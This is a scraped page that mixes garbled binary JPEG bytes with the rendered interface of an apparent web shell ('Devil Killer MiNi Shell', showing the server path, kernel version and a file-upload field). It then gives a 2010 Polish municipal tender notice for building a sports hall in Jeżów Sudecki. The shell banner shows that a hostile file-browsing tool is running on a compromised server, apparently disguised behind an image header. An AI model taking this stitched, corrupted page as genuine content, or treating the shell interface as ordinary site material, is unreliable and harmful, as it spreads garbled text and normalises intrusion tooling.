JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100831/236697-N-2010.html

<p class="kh_header"><b>Jeżów Sudecki: Budowa hali sportowej w Jeżowie Sudeckim przy ul. Krętej, działka 735/7</b><br>
<b>Numer ogłoszenia: 236697 - 2010; data zamieszczenia: 31.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jeżów Sudecki , ul. Długa 63, 58-521 Jeżów Sudecki, woj. dolnośląskie, tel. 075 7132254, faks 075 7132254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jezowsudecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali sportowej w Jeżowie Sudeckim przy ul. Krętej, działka 735/7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> hala sportowa wolnostojąca, niepodpiwniczona, w części  sportowej-parterowa, w części zaplecza- 3 kondygnacyjna. Rzut obiektu w kształcie prostokąta o wym. 24,28*53,20 [m] , wysokości 9,45[m]. 
HALA  posiada:
- boisko wielofunkcyjne o wym. 18 * 36 [m]  umożliwiające jednoczesną grę na dwóch boiskach do siatkówki lub grę na boisku do piłki koszykowej lub grę w piłkę ręczną na
niepełnowymiarowym boisku, 
- pełne zaplecze szatniowo-sanitarne dla 40 osób - zawodników, dodatkową salę  do ćwiczeń gimnastyczno-ruchowych dla 10 osób niepełnosprawnych, toaletę ogólnodostępną dla widzów. 
- widownię umiejscowioną wzdłuż poprzecznego wymiaru boiska, przewidzianą na 166 miejsc stałych, przy czym  ilość miejsc na widowni może być powiększona o około 200 miejsc siedzących na trybunach rozsuwanych ustawianych wzdłuż płyty boiska wielofunkcyjnego, po obu jej stronach.
Dane techniczne :  
- powierzchnia zabudowy: 1285 m2  
- powierzchnia całkowita : 1568,36 m2  
- powierzchnia użytkowa : 1474,68 m2 
- kubatura:  10628,55 m3 
Charakterystyka robót:
- fundamenty żelbetowe B20 zbrojone stalą AIII i AO
- słupy ram głównych z drewna klejonego warstwowo oparte na  stopach fundamentowych
- ściany z bloczków gazobetonowych oparte na ławach  żelbetowych
- belki podwali nowe oparte na fundamentach
- ściany zewnętrzne budynku zaprojektowane w systemie lekkiej obudowy, mocowanej do konstrukcji   
  drewnianej lub żelbetowej obiektu
- ściany wewnętrzne w technologii murowanej z bloczków gazobetonowych otynkowane tynkiem cementowo-wapiennym
- dach dwuspadowy, z płyt dachowych typu sandwich z wypełnieniem pianką poliuretanową
- konstrukcję dachu stanowią ramy i płatwie z drewna klejonego 



- ściany działowe gipsowo-kartonowe
- sufity z płyt gipsowo-kartonowych, podwieszane 
- malowanie ścian i sufitów farbami akrylowymi lub emulsyjnymi
- posadzka sali sportowej -systemowa o ustroju sprężystym
- posadzki zaplecza: płytki gresowe, parkiet drewniany, wykładzina PCV.
- nad wejściem głównym zadaszenie: profile stalowe, płyty poliwęglanowe 
- wokół budynku- opaska żwirowa.
- kotłownia gazowa ( kaskada dwóch kotłów kondensacyjnych  2 x 84 kW )

ZAGOSPODAROWANIE  terenu
Zakres  projektowanych robót obejmuje:
-  rozbiórkę  istniejącego budynku gospodarczo-magazynowego
- budowę projektowanego budynku hali sportowej
- przebudowę drogi wewnętrznej, utwardzonego placu manewrowego i stanowisk do parkowania   
  samochodów osobowych
- budowę instalacji kanalizacji sanitarnej, wodociągowej, elektrycznej, gazowej
   (odprowadzenie ścieków sanitarnych z budynku - do bezodpływowych osadników o pojemności    
    V=19,6 m3 ,  odprowadzenie ścieków deszczowych do kanalizacji deszczowej, zasilanie w wodę          
    - z sieci wodociągowej z projektowanego przyłącza wodociągowego, zasilanie w energię  
    elektryczną - z projektowanego przyłącza  kablowego ,wewnętrzna instalacja gazowa -                       
    z projektowanego przyłącza,
    
- budowę muru oporowego.

WYSPOSAŻENIE   hali w sprzęt sportowy stanowić będzie odrębne postępowanie o udzielenie
zamówienia ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające może być udzielone wybranemu , w drodze niniejszego postępowania, 
wykonawcy, kiedy zaistnieje konieczność powtórzenia tego samego rodzaju zamówienia zgodnego z przedmiotem zamówienia podstawowego , o wartości nie większej niż  50% wartości zamówienia podstawowego i w okresie do 3 lat od udzielenia tego zamówienia.
Zamówienie dodatkowe może dotyczyć robót w zakresie zagospodarowania terenu  działki, na której realizowana jest hala sportowa.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.11.12.00-0, 45.26.24.10-8, 45.40.00.00-1, 45.30.00.00-0, 45.33.00.00-9, 45.31.00.00-3, 45.23.32.00-1, 45.23.10.00-5, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości 
                                     
100 000     PLN    (słownie: sto tysięcy złotych  )





2. Wadium może być wniesione w następujących formach:

a)	pieniądzu

b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej         z  tym ,  że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,

c)	gwarancjach bankowych,

d)	gwarancjach ubezpieczeniowych,

e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275, z późniejszymi zmianami).

3.  W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:

a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego tj. Jeżów Sudecki),  gwaranta ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib,

b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,

c)	kwotę gwarancji,

d)	termin ważności gwarancji,

e)  zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :

- że  wykonawca ,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy P.z.p.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 ustawy P.z.p.,            lub  pełnomocnictw , a nie udowodnił , że nie wynikało to z przyczyn leżących po jego stronie

lub

-  że wykonawca ,  którego ofertę wybrano:
 - podpisania umowy na warunkach określonych w ofercie,     lub
 - nie wniósł zabezpieczenia należytego wykonania umowy,                  lub
 - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i  2.e).

4. Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem - na rachunek Zamawiającego,  otwarty  w  PLN  :    Bank PKO BP SA Oddział Jelenia Góra ,
 numer  74 1020 2124 0000 8302 0011  0015 ,  z adnotacją w tytule wpłaty : Wadium  - hala sportowa

Wadium wnoszone w innej, niż  pieniądz dopuszczonej przez Zamawiającego formie / formach wykonawca wnosi do Zamawiającego  przy czym ,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania w kasie Urzędu Gminy - parter budynku,  w godzinach urzędowania  
07:30 do 15:30,   od poniedziałku do piątku .

6. Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie /formach wykonawca może  dołączyć do oferty - pod warunkiem ,  że umieszczone zostanie w osobnej  kopercie  opisanej (nazwa wykonawcy, adnotacja: Wadium - hala sportowa ), w sposób umożliwiający Zamawiającemu  zdeponowanie wadium  w kasie Urzędu Gminy , przed upływem terminu do otwarcia  ofert - bez konieczności naruszenia  koperty , w której znajduje się oferta. 
 
7.  Wadium należy wnieść przed upływem terminu do składania ofert, przy czym wniesienie wadium    w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu do składania ofert. 

Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.



8.  Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.
  
9.  Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  wykonawca w  odpowiedzi  na wezwanie , o którym  mowa w punkcie 27.  nie złożył wymaganych przez Zamawiającego dokumentów lub oświadczeń o których mowa w art.25 ust.1 u.p.z.p., lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.  

10.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 

a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie  

b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy

c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

UWAGA:
Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-poparta należytym wykonaniem w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie-  robót budowlanych:
a)  polegających na budowie co najmniej dwóch (2) obiektów z grupy hal sportowych, widowiskowych , handlowych typu markety, centra handlowe , każdy  o kubaturze co najmniej 10 000m3 -  przy  dopuszczalnej odchyłce in (-) do 10%  i  powierzchni użytkowej  co najmniej  1 000 m2 -  przy  dopuszczalnej odchyłce  in (-) do 5%,  konstrukcji dachu z drewna klejonego i pokryciu  z płyt dachowych typu sandwich.

Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych z wymaganym zakresem sporządzony według wzoru stanowiącego Załącznik Nr 4 do IDW, z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN -  należy podać kwotę w PLN , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień 31.08. 2010 r. 
Wykonawca może polegać na wiedzy i doświadczeniu  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 


Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym :
Inny podmiot udostępniający wiedzę                            i doświadczenie  tj. elementów niezbywalnych wykonawcy, musi wystąpić przy realizacji przedmiotu zamówienia w charakterze podwykonawcy. 


 W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie- w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               - Załącznik Nr 2 do IDW

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- należy wskazać do uczestnictwa w wykonaniu niniejszego zamówienia 
a)	Kierownika Budowy   posiadającego :

°  co najmniej pięć (5) lat doświadczenia zawodowego na stanowisku kierownika budowy, 

° uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej 
lub 
    odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej    obowiązujących przepisów 

 
° ważny na dzień upływu terminu  składania ofert dokument potwierdzający przynależność  do   właściwej  Izby Inżynierów Budownictwa,

b)	Kierownika robót  lub majstra robót posiadającego: 

°  co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy lub majstra robót , 

°  uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej              w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych             i kanalizacyjnych  bez ograniczeń 
lub 
   odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej wydanych przepisów w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych 
( dopuszcza się posiadanie uprawnień w w/w zakresie przez dwie osoby  pod warunkiem , że obie zostaną wskazane na kierowników robót i/ lub majstrów robót zakresu odpowiadającego ich uprawnieniom. 

c)	Kierownika robót lub majstra robót,  posiadającego :

°  co najmniej dwa (2)  lata doświadczenia zawodowego na stanowisku kierownika budowy lub   
    majstra robót , 

°  uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności instalacyjnej                     
    w  zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
 lub 
    odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej
    wydanych przepisów .
  
Przez wymagany  minimalny okres  doświadczenia zawodowego   należy rozumieć łączną ilość   miesięcy przepracowanych  na stanowisku jak proponowane, przy realizacji robót o podobnym charakterze jak przedmiot zamówienia.

Do minimalnego okresu doświadczenia zawodowego na stanowisku kierownika budowy i/lub majstra budowy  nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie . 

Przez wymagany okres doświadczenia zawodowego  należy rozumieć  okres od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych .

Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
Dysponowanie osobami  wymienionymi  powyżej , należy traktować jako minimalne wymagania Zamawiającego, nie wyczerpujące całości personelu niezbędnego do rzetelnego wypełnienia zobowiązań wykonawcy.
Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:
1)Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do IDW i fakultatywnie wzór Załącznika Nr 5.1

2)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego- Załącznik Nr 6 do IDW.

Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 


Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,  
 W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny  kadrowy  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
 Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               - Załącznik Nr 2 do IDW.

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- poparta posiadaniem 

a)  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej 
- w wysokości co najmniej   500 000  PLN ,

Wykonawcy zobowiązani są przedłożyć informację z banku  lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej  
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.


b)  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  stanowiącej co najmniej  równowartość ceny ofertowej za wykonanie przedmiotu zamówienia, przy czym odpowiedzialność  kontraktowa nie może stanowić mniej niż 80% kwoty ogólnej ubezpieczenia.  


Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta
uznana zostanie za najkorzystniejszą   -  przed podpisaniem umowy.

Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym :

- jeżeli  dotyczy to środków finansowych, o których mowa w punkcie 1.4.a) - od takiego podmiotu wymagane jest przedłożenie informacji,takiej samej jak od wykonawcy
 W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               - Załącznik Nr 2 do IDW.

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
